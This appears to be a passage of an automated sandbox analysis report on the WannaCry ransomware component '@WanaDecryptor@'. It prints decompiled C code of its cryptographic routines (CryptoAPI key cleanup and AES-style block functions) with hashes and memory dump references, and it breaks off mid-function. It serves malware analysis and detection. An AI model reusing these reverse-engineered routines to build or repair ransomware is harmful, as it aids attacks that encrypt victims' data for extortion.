                                  Similarity
                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                  • String ID:
                                  • API String ID: 3429775523-0
                                  • Opcode ID: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
                                  • Instruction ID: 94521974df2238a1dc1099b42d01a28c9688a26bfb2bc835d8f4af5c6999d558
                                  • Opcode Fuzzy Hash: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
                                  • Instruction Fuzzy Hash: 3E012C71148380BFE340DB6888C4AABBFE8EBD4704FC4985DF58543252D234D848DB6B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404770 Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404770(void* __ecx) {
				long* _t7;
				long* _t8;
				long* _t9;
				void* _t15;

				_t15 = __ecx;
				_t7 =  *(__ecx + 8);
				if(_t7 != 0) {
					CryptDestroyKey(_t7);
					 *(_t15 + 8) = 0;
				}
				_t8 =  *(_t15 + 0xc);
				if(_t8 != 0) {
					CryptDestroyKey(_t8);
					 *(_t15 + 0xc) = 0;
				}
				_t9 =  *(_t15 + 4);
				if(_t9 != 0) {
					CryptReleaseContext(_t9, 0);
					 *(_t15 + 4) = 0;
				}
				return 1;
			}







                                  0x00404771
                                  0x00404773
                                  0x00404778
                                  0x0040477b
                                  0x00404781
                                  0x00404781
                                  0x00404788
                                  0x0040478d
                                  0x00404790
                                  0x00404796
                                  0x00404796
                                  0x0040479d
                                  0x004047a2
                                  0x004047a7
                                  0x004047ad
                                  0x004047ad
                                  0x004047ba

                                  APIs
                                  • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
                                  • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
                                  • CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Destroy$ContextRelease
                                  • String ID:
                                  • API String ID: 1308222791-0
                                  • Opcode ID: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
                                  • Instruction ID: 61d89c14c75fb5affeedc9811425020a0caf5e5d08399d1baa26ca37d3ca979d
                                  • Opcode Fuzzy Hash: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
                                  • Instruction Fuzzy Hash: 22E0EDB03007018BD7309F65D888B4377E8AF84714F04882DF85AE77D0C778E8408B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A9D0 Relevance: 3.3, APIs: 2, Instructions: 315COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 33%
                                  			E0040A9D0(intOrPtr __ecx, signed int _a4, signed char* _a8) {
				void* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v25;
				void* _v26;
				signed int _v28;
				void* _v29;
				void* _v30;
				void* _v31;
				signed int _v32;
				void* _v33;
				void* _v34;
				void* _v35;
				signed int _v36;
				void* _v37;
				void* _v38;
				void* _v39;
				signed int _v40;
				signed int _t161;
				signed int _t162;
				signed char* _t165;
				signed int _t187;
				signed int _t188;
				intOrPtr _t190;
				signed int _t277;
				signed int _t345;
				signed int _t346;
				signed int _t349;
				signed int _t360;
				signed int _t361;
				signed int _t364;
				intOrPtr _t375;
				intOrPtr _t386;
				void* _t387;
				signed int _t388;

				_t375 = __ecx;
				_v24 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t345 = 0xbadbad ^  *(_t375 + 0x1e8);
				_v28 = 0 << 0x18;
				_v40 = 0xbadbad ^  *(_v24 + 0x1ec);
				_t277 = 0xbadbad ^  *(_v24 + 0x1f0);
				_v32 = 0 << 0x18;
				_t386 = _v24;
				_t161 =  *(_t386 + 0x410);
				_v36 = 0xbadbad ^  *(_t386 + 0x1f4);
				_v16 = _t161;
				if(_t161 > 1) {
					_a4 = _t386 + 0x210;
					_v20 = _t161 - 1;
					do {
						_t349 = _t345 & 0x000000ff;
						_t187 = _a4;
						_t188 = _t187 + 0x20;
						_a4 = _t188;
						_v40 =  *0x004189B0 ^  *0x004181B0 ^  *0x004185B0 ^  *(0x418db0 + (_t277 & 0x000000ff) * 4) ^  *(_a4 - 4);
						_t277 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + (_v36 & 0x000000ff) * 4) ^  *_a4;
						_t345 =  *0x004185B0 ^  *0x004189B0 ^  *0x004181B0 ^  *(0x418db0 + (_v40 & 0x000000ff) * 4) ^  *(_t188 - 0x28);
						_t190 = _v20 - 1;
						_v28 = _t345;
						_v32 = _t277;
						_v36 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + _t349 * 4) ^  *(_t187 + 4);
						_v20 = _t190;
					} while (_t190 != 0);
					_t161 = _v16;
					_t386 = _v24;
				}
				_t162 = _t161 << 5;
				_t360 =  *(_t162 + _t386 + 0x1e8);
				_t387 = _t162 + _t386 + 0x1e8;
				_a4 = _t360;
				_t165 = _a8;
				 *_t165 =  *0x004170B0 ^ _t360 >> 0x00000018;
				_t165[1] =  *0x004170B0 ^ _t360 >> 0x00000010;
				_t165[2] =  *0x004170B0 ^ _t360 >> 0x00000008;
				_t165[3] =  *((_v40 & 0x000000ff) + 0x4170b0) ^ _a4;
				_t361 =  *(_t387 + 4);
				_a4 = _t361;
				_t165[4] =  *0x004170B0 ^ _t361 >> 0x00000018;
				_t165[5] =  *0x004170B0 ^ _t361 >> 0x00000010;
				_t165[6] =  *0x004170B0 ^ _t361 >> 0x00000008;
				_t165[7] =  *((_v32 & 0x000000ff) + 0x4170b0) ^ _a4;
				_t364 =  *(_t387 + 8);
				_a4 = _t364;
				_t165[8] =  *0x004170B0 ^ _t364 >> 0x00000018;
				_t165[9] =  *0x004170B0 ^ _t364 >> 0x00000010;
				_t125 = _t345 + 0x4170b0; // 0xd56a0952
				_t165[0xa] =  *_t125 ^ _t364 >> 0x00000008;
				_t346 = _t345 & 0x000000ff;
				_t165[0xb] =  *((_v36 & 0x000000ff) + 0x4170b0) ^ _a4;
				_t388 =  *(_t387 + 0xc);
				_a4 = _t388;
				_t165[0xc] =  *0x004170B0 ^ _t388 >> 0x00000018;
				_t165[0xd] =  *0x004170B0 ^ _t388 >> 0x00000010;
				_t165[0xe] =  *0x004170B0 ^ _t388 >> 0x00000008;
				_t142 = _t346 + 0x4170b0; // 0xd56a0952
				_t165[0xf] =  *_t142 ^ _a4;
				return _t165;
			}







































                                  0x0040a9d4
                                  0x0040a9d6
                                  0x0040a9df
                                  0x0040a9ea
                                  0x0040a9f4
                                  0x0040a9f9
                                  0x0040a9fa
                                  0x0040a9fa
                                  0x0040aa31
                                  0x0040aa35
                                  0x0040aa6f
                                  0x0040aa93
                                  0x0040aa97
                                  0x0040aab5
                                  0x0040aabf
                                  0x0040aaca
                                  0x0040aace
                                  0x0040aad2
                                  0x0040aadf
                                  0x0040aae3
                                  0x0040aae7
                                  0x0040ab49
                                  0x0040ab9b
                                  0x0040abb9
                                  0x0040abc3
                                  0x0040abe9
                                  0x0040abf4
                                  0x0040abff
                                  0x0040ac03
                                  0x0040ac04
                                  0x0040ac08
                                  0x0040ac0c
                                  0x0040ac10
                                  0x0040ac10
                                  0x0040ac1a
                                  0x0040ac1e
                                  0x0040ac1e
                                  0x0040ac22
                                  0x0040ac25
                                  0x0040ac2c
                                  0x0040ac3b
                                  0x0040ac48
                                  0x0040ac54
                                  0x0040ac65
                                  0x0040ac7d
                                  0x0040ac92
                                  0x0040ac95
                                  0x0040aca0
                                  0x0040acb1
                                  0x0040accb
                                  0x0040ace9
                                  0x0040acf4
                                  0x0040acf7
                                  0x0040ad02
                                  0x0040ad13
                                  0x0040ad29
                                  0x0040ad33
                                  0x0040ad49
                                  0x0040ad4c
                                  0x0040ad5c
                                  0x0040ad5f
                                  0x0040ad6a
                                  0x0040ad7b
                                  0x0040ad91
                                  0x0040ada6
                                  0x0040ada9
                                  0x0040adb6
                                  0x0040adbc

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A9EA
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A9FA
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
                                  • Instruction ID: 04248197bcb1574b3d90ae1a3c7ae13e194e7d8d0e6a6b40a3143ad68c5bfd1a
                                  • Opcode Fuzzy Hash: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
                                  • Instruction Fuzzy Hash: 0AC18E3260C3D14FD305CF7994A41ABBFE2AF9E300F9E98ADE5D98B312C5609505CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A610 Relevance: 3.3, APIs: 2, Instructions: 308COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 33%
                                  			E0040A610(signed int __ecx) {
				signed char* _t157;
				signed int _t259;
				signed int _t260;
				signed int _t276;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t378;
				signed int _t379;
				void* _t380;
				signed int _t381;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t393;

				_t391 = __ecx;
				 *(_t393 + 0x18) = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push(_t393 + 0x1c);
					L004130FC();
				}
				_t276 = 0xbadbad ^  *(_t391 + 8);
				 *(_t393 + 0x18) = 0 << 0x18;
				 *(_t393 + 0x14) = 0xbadbad ^  *(_t391 + 0xc);
				_t259 = 0xbadbad ^  *(_t391 + 0x10);
				 *(_t393 + 0x1c) = 0 << 0x18;
				_t378 =  *(_t391 + 0x410);
				 *(_t393 + 0x10) =  *(_t391 + 0x14) ^ 0xbadbad;
				 *(_t393 + 0x20) = _t378;
				if(_t378 > 1) {
					_t392 = _t391 + 0x30;
					 *(_t393 + 0x38) = _t378 - 1;
					do {
						_t392 = _t392 + 0x20;
						 *(_t393 + 0x14) =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + (_t276 & 0x000000ff) * 4) ^  *(_t392 - 0x24);
						 *(_t393 + 0x10) =  *0x004171B0 ^  *0x004179B0 ^  *0x004175B0 ^  *(0x417db0 + (_t259 & 0x000000ff) * 4) ^  *(_t392 - 0x1c);
						_t259 =  *0x004175B0 ^  *0x004171B0 ^  *0x004179B0 ^  *(0x417db0 + ( *(_t393 + 0x14) & 0x000000ff) * 4) ^  *(_t392 - 0x20);
						_t276 =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + ( *(_t393 + 0x10) & 0x000000ff) * 4) ^  *(_t392 - 0x28);
						_t390 =  *(_t393 + 0x38) - 1;
						 *(_t393 + 0x18) = _t276;
						 *(_t393 + 0x1c) = _t259;
						 *(_t393 + 0x38) = _t390;
					} while (_t390 != 0);
					_t378 =  *(_t393 + 0x20);
					_t391 =  *((intOrPtr*)(_t393 + 0x24));
				}
				_t379 = _t378 << 5;
				_t357 =  *(_t391 + 8 + _t379);
				_t380 = _t391 + 8 + _t379;
				_t157 =  *(_t393 + 0x3c);
				 *_t157 =  *0x00416FB0 ^ _t357 >> 0x00000018;
				 *(_t393 + 0x38) = _t357;
				_t157[1] =  *0x00416FB0 ^ _t357 >> 0x00000010;
				_t87 = _t259 + 0x416fb0; // 0x7b777c63
				_t157[2] =  *_t87 ^ _t357 >> 0x00000008;
				_t157[3] =  *(( *(_t393 + 0x10) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
				_t358 =  *(_t380 + 4);
				 *(_t393 + 0x38) = _t358;
				_t157[4] =  *0x00416FB0 ^ _t358 >> 0x00000018;
				_t157[5] =  *0x00416FB0 ^ _t358 >> 0x00000010;
				_t157[6] =  *0x00416FB0 ^ _t358 >> 0x00000008;
				_t157[7] =  *(( *(_t393 + 0x18) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
				_t359 =  *(_t380 + 8);
				 *(_t393 + 0x38) = _t359;
				_t157[8] =  *0x00416FB0 ^ _t359 >> 0x00000018;
				_t157[9] =  *0x00416FB0 ^ _t359 >> 0x00000010;
				_t260 = _t259 & 0x000000ff;
				_t157[0xa] =  *0x00416FB0 ^ _t359 >> 0x00000008;
				_t157[0xb] =  *(( *(_t393 + 0x14) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
				_t381 =  *(_t380 + 0xc);
				 *(_t393 + 0x34) = _t381;
				_t157[0xc] =  *0x00416FB0 ^ _t381 >> 0x00000018;
				_t157[0xd] =  *0x00416FB0 ^ _t381 >> 0x00000010;
				_t157[0xe] =  *0x00416FB0 ^ _t381 >> 0x00000008;
				_t134 = _t260 + 0x416fb0; // 0x7b777c63
				_t157[0xf] =  *_t134 ^  *(_t393 + 0x2c);
				return _t157;
			}


















                                  0x0040a614
                                  0x0040a616
                                  0x0040a61f
                                  0x0040a62a
                                  0x0040a634
                                  0x0040a639
                                  0x0040a63a
                                  0x0040a63a
                                  0x0040a66f
                                  0x0040a67c
                                  0x0040a6a5
                                  0x0040a6c0
                                  0x0040a6c4
                                  0x0040a6e9
                                  0x0040a6ef
                                  0x0040a6f6
                                  0x0040a6fa
                                  0x0040a700
                                  0x0040a704
                                  0x0040a708
                                  0x0040a70a
                                  0x0040a7d5
                                  0x0040a806
                                  0x0040a811
                                  0x0040a818
                                  0x0040a81a
                                  0x0040a81b
                                  0x0040a81f
                                  0x0040a823
                                  0x0040a823
                                  0x0040a82d
                                  0x0040a831
                                  0x0040a831
                                  0x0040a835
                                  0x0040a83a
                                  0x0040a842
                                  0x0040a855
                                  0x0040a85c
                                  0x0040a864
                                  0x0040a872
                                  0x0040a87c
                                  0x0040a888
                                  0x0040a89d
                                  0x0040a8a0
                                  0x0040a8ab
                                  0x0040a8bc
                                  0x0040a8d2
                                  0x0040a8ea
                                  0x0040a8ff
                                  0x0040a902
                                  0x0040a90d
                                  0x0040a91e
                                  0x0040a934
                                  0x0040a946
                                  0x0040a952
                                  0x0040a968
                                  0x0040a96b
                                  0x0040a976
                                  0x0040a987
                                  0x0040a99d
                                  0x0040a9b3
                                  0x0040a9b6
                                  0x0040a9c3
                                  0x0040a9c9

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A62A
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A63A
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
                                  • Instruction ID: 24c55d493b92f0f745426086bc8efec80d3c09ac131e354686a8208b9adac079
                                  • Opcode Fuzzy Hash: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
                                  • Instruction Fuzzy Hash: CFC15B2260C2C24BD705CF7998E04EBFFE3AF9E204B4E95A9D5C99B322C5719409C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B0C0 Relevance: 3.2, APIs: 2, Instructions: 242COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0040B0C0(intOrPtr __ecx) {
				intOrPtr _t137;
				signed int _t141;
				signed int _t142;
				signed int* _t144;
				signed int _t145;
				void* _t173;
				signed int* _t189;
				signed int _t192;
				signed int _t196;
				intOrPtr _t198;
				signed char _t200;
				intOrPtr _t207;
				signed int _t227;
				signed int _t231;
				intOrPtr _t233;
				intOrPtr _t262;
				void* _t266;
				signed int _t268;
				signed int* _t270;
				signed char* _t274;
				signed char* _t275;
				signed char* _t276;
				signed char* _t277;
				intOrPtr _t281;
				signed int _t282;
				intOrPtr _t286;
				void* _t287;

				_t286 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push(_t287 + 0x34);
					L004130FC();
				}
				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
				if(_t137 != 0x10) {
					asm("cdq");
					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
					if(_t196 != 4) {
						_t141 = (0 | _t196 != 0x00000006) + 1;
					} else {
						_t141 = 0;
					}
					_t142 = _t141 << 5;
					_t9 = _t142 + 0x41a1dc; // 0x3
					_t233 =  *_t9;
					_t10 = _t142 + 0x41a1e4; // 0x2
					_t198 =  *_t10;
					_t11 = _t142 + 0x41a1ec; // 0x1
					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
					_t15 = _t286 + 0x454; // 0x4a8
					_t144 = _t15;
					if(_t196 > 0) {
						_t282 =  *(_t287 + 0x44);
						_t17 = _t286 + 0x1e8; // 0x23c
						 *(_t287 + 0x10) = _t17;
						 *(_t287 + 0x18) = _t196;
						do {
							 *_t144 = 0 << 0x18;
							_t268 =  *_t144 | 0 << 0x00000010;
							 *_t144 = _t268;
							 *_t144 = _t268;
							_t270 = _t144;
							_t282 = _t282 + 4;
							_t144 =  &(_t144[1]);
							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
							_t227 =  *(_t287 + 0x18) - 1;
							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
							 *(_t287 + 0x18) = _t227;
						} while (_t227 != 0);
						_t198 =  *((intOrPtr*)(_t287 + 0x14));
					}
					_t145 = 1;
					 *(_t287 + 0x1c) = 1;
					if( *(_t286 + 0x410) > 1) {
						_t28 = _t286 + 0x208; // 0x25c
						 *(_t287 + 0x44) = _t28;
						do {
							if(_t196 > 0) {
								_t281 = _t233;
								 *(_t287 + 0x18) =  *(_t287 + 0x44);
								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
								_t33 = _t286 + 0x434; // 0x488
								_t266 = _t33;
								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
								 *(_t287 + 0x10) = _t196;
								while(1) {
									_t266 = _t266 + 4;
									asm("cdq");
									 *(_t287 + 0x2c) = 0;
									asm("cdq");
									asm("cdq");
									_t189 =  *(_t287 + 0x18);
									 *(_t287 + 0x18) =  &(_t189[1]);
									 *(_t266 - 4) =  *(0x4189b0 +  *(_t287 + 0x2c) * 4) ^  *(0x418db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004185B0 ^  *0x004181B0 ^  *_t189;
									_t281 = _t281 + 1;
									_t192 =  *(_t287 + 0x10) - 1;
									 *(_t287 + 0x10) = _t192;
									if(_t192 == 0) {
										break;
									}
									_t207 =  *((intOrPtr*)(_t287 + 0x24));
								}
								_t233 =  *((intOrPtr*)(_t287 + 0x30));
							}
							_t79 = _t286 + 0x434; // 0x488
							_t80 = _t286 + 0x454; // 0x4a8
							_t173 = memcpy(_t80, _t79, _t196 << 2);
							_t287 = _t287 + 0xc;
							_t145 = _t173 + 1;
							_t198 =  *((intOrPtr*)(_t287 + 0x14));
							 *(_t287 + 0x1c) = _t145;
							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
						} while (_t145 <  *(_t286 + 0x410));
					}
					 *(_t287 + 0x44) = 0;
					if(_t196 > 0) {
						_t274 =  *(_t287 + 0x48);
						_t89 = _t286 + 0x454; // 0x4a8
						 *(_t287 + 0x48) = _t89;
						_t262 = _t198;
						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
						do {
							_t200 =  *(_t286 + 0x1e8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
							 *_t274 =  *0x004170B0 ^ _t200 >> 0x00000018;
							_t275 =  &(_t274[1]);
							asm("cdq");
							 *_t275 =  *0x004170B0 ^ _t200 >> 0x00000010;
							asm("cdq");
							_t276 =  &(_t275[1]);
							 *_t276 =  *0x004170B0 ^ _t200 >> 0x00000008;
							_t277 =  &(_t276[1]);
							asm("cdq");
							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x4170b0) ^ _t200;
							_t274 =  &(_t277[1]);
							_t145 =  *(_t287 + 0x44) + 1;
							_t262 = _t262 + 1;
							 *(_t287 + 0x44) = _t145;
							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
						} while (_t145 < _t196);
					}
					return _t145;
				} else {
					return E0040A9D0(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
				}
			}






























                                  0x0040b0c5
                                  0x0040b0ce
                                  0x0040b0d9
                                  0x0040b0e3
                                  0x0040b0e8
                                  0x0040b0e9
                                  0x0040b0e9
                                  0x0040b0ee
                                  0x0040b0f7
                                  0x0040b114
                                  0x0040b11c
                                  0x0040b122
                                  0x0040b130
                                  0x0040b124
                                  0x0040b124
                                  0x0040b124
                                  0x0040b131
                                  0x0040b136
                                  0x0040b136
                                  0x0040b13c
                                  0x0040b13c
                                  0x0040b142
                                  0x0040b148
                                  0x0040b14c
                                  0x0040b150
                                  0x0040b154
                                  0x0040b154
                                  0x0040b15a
                                  0x0040b15c
                                  0x0040b160
                                  0x0040b166
                                  0x0040b16a
                                  0x0040b16e
                                  0x0040b175
                                  0x0040b181
                                  0x0040b186
                                  0x0040b18f
                                  0x0040b193
                                  0x0040b19b
                                  0x0040b19c
                                  0x0040b1a1
                                  0x0040b1ae
                                  0x0040b1af
                                  0x0040b1b3
                                  0x0040b1b3
                                  0x0040b1b9
                                  0x0040b1b9
                                  0x0040b1c3
                                  0x0040b1ca
                                  0x0040b1ce
                                  0x0040b1d4
                                  0x0040b1da
                                  0x0040b1de
                                  0x0040b1e0
                                  0x0040b1ea
                                  0x0040b1ec
                                  0x0040b1f8
                                  0x0040b1fa
                                  0x0040b1fa
                                  0x0040b200
                                  0x0040b204
                                  0x0040b208
                                  0x0040b216
                                  0x0040b218
                                  0x0040b21b
                                  0x0040b22c
                                  0x0040b230
                                  0x0040b255
                                  0x0040b278
                                  0x0040b283
                                  0x0040b28b
                                  0x0040b28e
                                  0x0040b28f
                                  0x0040b290
                                  0x0040b294
                                  0x00000000
                                  0x00000000
                                  0x0040b20e
                                  0x0040b212
                                  0x0040b29a
                                  0x0040b29a
                                  0x0040b2a4
                                  0x0040b2aa
                                  0x0040b2b0
                                  0x0040b2b0
                                  0x0040b2bc
                                  0x0040b2c2
                                  0x0040b2c6
                                  0x0040b2ca
                                  0x0040b2ca
                                  0x0040b1de
                                  0x0040b2d6
                                  0x0040b2de
                                  0x0040b2e4
                                  0x0040b2e8
                                  0x0040b2ee
                                  0x0040b2fa
                                  0x0040b2fc
                                  0x0040b300
                                  0x0040b304
                                  0x0040b313
                                  0x0040b332
                                  0x0040b334
                                  0x0040b338
                                  0x0040b351
                                  0x0040b355
                                  0x0040b35a
                                  0x0040b373
                                  0x0040b375
                                  0x0040b379
                                  0x0040b398
                                  0x0040b39a
                                  0x0040b39b
                                  0x0040b39f
                                  0x0040b3a2
                                  0x0040b3a6
                                  0x0040b3a6
                                  0x0040b304
                                  0x0040b3b7
                                  0x0040b0f9
                                  0x0040b111
                                  0x0040b111

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B0D9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B0E9
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
                                  • Instruction ID: 635c181c6a855438023d43a1e61ad1cbf7521d36b86b6127b0536a3f97539009
                                  • Opcode Fuzzy Hash: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
                                  • Instruction Fuzzy Hash: 5F91AE756083858FC718CF28D8906AABBE2FFC9304F14487EE989D7351D634A945CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ADC0 Relevance: 3.2, APIs: 2, Instructions: 242COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0040ADC0(signed int __ecx) {
				intOrPtr _t137;
				signed int _t141;
				signed int _t142;
				signed int* _t144;
				signed int _t145;
				void* _t173;
				signed int* _t189;
				signed int _t192;
				signed int _t196;
				intOrPtr _t198;
				signed char _t200;
				intOrPtr _t207;
				signed int _t227;
				signed int _t231;
				intOrPtr _t233;
				intOrPtr _t262;
				void* _t266;
				signed int _t268;
				signed int* _t270;
				signed char* _t274;
				signed char* _t275;
				signed char* _t276;
				signed char* _t277;
				intOrPtr _t281;
				signed int _t282;
				signed int _t286;
				void* _t287;

				_t286 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push(_t287 + 0x34);
					L004130FC();
				}
				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
				if(_t137 != 0x10) {
					asm("cdq");
					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
					if(_t196 != 4) {
						_t141 = (0 | _t196 != 0x00000006) + 1;
					} else {
						_t141 = 0;
					}
					_t142 = _t141 << 5;
					_t9 = _t142 + 0x41a1d8; // 0x1
					_t233 =  *_t9;
					_t10 = _t142 + 0x41a1e0; // 0x2
					_t198 =  *_t10;
					_t11 = _t142 + 0x41a1e8; // 0x3
					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
					_t15 = _t286 + 0x454; // 0x4a8
					_t144 = _t15;
					if(_t196 > 0) {
						_t282 =  *(_t287 + 0x44);
						_t17 = _t286 + 8; // 0x5c
						 *(_t287 + 0x10) = _t17;
